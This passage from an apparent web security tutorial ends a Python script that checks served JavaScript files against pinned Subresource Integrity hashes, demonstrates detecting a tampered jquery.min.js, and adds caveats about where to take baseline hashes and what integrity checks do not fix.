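            result[path] = "ok" if sri_hash(body) == expected else "mismatch"
    for path in served:
        result.setdefault(path, "unpinned")
    return result


def script_tag(path: str, manifest: dict) -> str:
    """Emit a <script> tag that makes the browser refuse a file whose hash has changed."""
    return (f'<script src="{path}" integrity="{manifest[path]}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    manifest = pin_manifest(SERVED_CLEAN)
    print(audit(SERVED_CLEAN, manifest))        # every path 'ok'

    compromised = dict(SERVED_CLEAN)
    compromised["/js/jquery.min.js"] += INJECTED_TAIL
    print(audit(compromised, manifest))         # /js/jquery.min.js -> 'mismatch'
    print(script_tag("/js/jquery.min.js", manifest))
```

Two caveats. The baseline is only as good as its source: pin the hash of the file you deployed (or the vendor's published SRI hash for that exact version), never a hash taken from the live server after an alert. And `integrity` protects the browser, not the server: a mismatch blocks execution and surfaces in the console, but the compromised file is still on disk until the host is cleaned.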